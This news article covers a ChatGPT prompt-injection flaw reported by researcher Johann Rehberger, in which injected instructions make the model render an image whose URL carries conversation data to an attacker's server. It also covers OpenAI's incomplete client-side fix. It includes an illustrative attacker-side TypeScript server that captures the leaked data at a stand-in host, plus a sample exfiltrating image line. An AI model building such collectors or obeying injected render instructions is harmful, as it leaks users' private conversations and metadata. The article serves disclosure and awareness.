OpenAI has rolled out a fix for a flaw that allowed ChatGPT data to be extracted and conversation details leaked to an external URL, months after security researchers first reported it. According to the researcher who discovered the flaw, however, the fix is incomplete, as attackers can still exploit it under certain conditions.
Additionally, the safety checks have not yet been implemented in the ChatGPT iOS app, so risks on that platform remain unaddressed.
Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023.
In November 2023, the researcher published further details on how he built a malicious version of ChatGPT that exploited the vulnerability to phish users.
OpenAI was notified on November 13, 2023 about the malicious version of ChatGPT and its underlying instructions, but the company closed the report on November 15, deeming it not applicable. “It seems best to make this information publicly available to raise awareness,” the researcher wrote.
Having received no further response from OpenAI, the researcher made his findings public, detailing a malicious version of ChatGPT that leaked conversation data to an external URL under his control.
The flaw allows data to be leaked to an external URL when ChatGPT processes a malicious prompt, raising concerns about user privacy. The attack requires the victim to submit a malicious prompt that either comes directly from the attacker or is posted somewhere for victims to discover and use. The exposed data can include the user's conversations as well as metadata such as timestamps, user IDs, and session IDs, and technical details such as IP addresses and user agent strings.
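The class of attack at issue here is image-based exfiltration: an injected prompt instructs the model to render an image hosted on a server the attacker controls, and the smuggled data rides along in the image URL's query string. The sketch below is illustrative only, with hypothetical names and URLs throughout; it shows the attacker-side endpoint that would collect whatever an injected prompt manages to leak.

```ts
// Illustrative attacker-side collection server (TypeScript on Node.js).
// All names and URLs are hypothetical. An injected prompt might instruct
// the model to render an image such as:
//   ![x](https://attacker.example/p.gif?d=<conversation data>)
// When the client displays the image, the request's query string delivers
// the smuggled data to this server.
import { createServer } from "node:http";

createServer((req, res) => {
  const url = new URL(req.url ?? "/", "https://attacker.example");
  const leaked = url.searchParams.get("d"); // exfiltrated payload, if present
  if (leaked) console.log("captured:", leaked);

  // Reply with a 1x1 transparent GIF so the image request appears to succeed.
  const pixel = Buffer.from(
    "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7",
    "base64"
  );
  res.writeHead(200, { "Content-Type": "image/gif" });
  res.end(pixel);
}).listen(8080, () => console.log("listening on :8080"));
```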
OpenAI responded by implementing client-side checks that call a validation API before images from external URLs are displayed, Rehberger explained in a blog post detailing the bug.
“Because ChatGPT is not open source and the fix was not implemented through a Content Security Policy, the specific details of the validation are unclear,” Rehberger said.
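Based on Rehberger's description, the check likely works something like the sketch below. The endpoint path, response shape, and fail-closed behavior are all assumptions, since, as he notes, the actual implementation is not observable from the client.

```ts
// Hypothetical sketch of a client-side image validation gate (TypeScript).
// The endpoint and response format are assumptions; the real check is
// opaque because the fix is not expressed in a Content Security Policy.
async function isUrlSafe(imageUrl: string): Promise<boolean> {
  const res = await fetch(
    `/backend-api/url_safe?url=${encodeURIComponent(imageUrl)}`
  );
  if (!res.ok) return false; // fail closed if the validation call errors
  const body: { safe?: boolean } = await res.json();
  return body.safe === true;
}

// Only assign the src (which triggers the outbound request) after the
// URL has passed validation.
async function renderImageIfSafe(imageUrl: string, img: HTMLImageElement) {
  if (await isUrlSafe(imageUrl)) {
    img.src = imageUrl;
  }
}
```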
The researcher noted, however, that ChatGPT still sends requests to arbitrary domains in some cases, so the attack can occasionally succeed, and he observed inconsistent results even when testing the same domain. The exact reason for these discrepancies cannot be determined, because the specific criteria that decide whether an external URL is considered safe are unknown. Even so, the researcher points out that the vulnerability is now much harder to exploit, since data transfers are rate-limited and the exfiltration process is slow.
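To see why rate limiting blunts the attack, consider a rough back-of-the-envelope model (every number below is an illustrative assumption, not a measurement): if each rendered image can carry only a tiny payload and renders are throttled, leaking even a short string requires many sequential requests.

```ts
// Illustrative throughput estimate; every figure here is an assumption.
const secret = "user-session-token-abc123"; // hypothetical data to exfiltrate
const charsPerRequest = 1;   // assume one character smuggled per image URL
const secondsPerRequest = 5; // assume throttling between successive renders

const totalSeconds =
  Math.ceil(secret.length / charsPerRequest) * secondsPerRequest;
console.log(`~${totalSeconds}s to leak ${secret.length} characters`);
// At this rate a short token takes minutes and a full conversation far
// longer, which is the practical barrier the researcher describes.
```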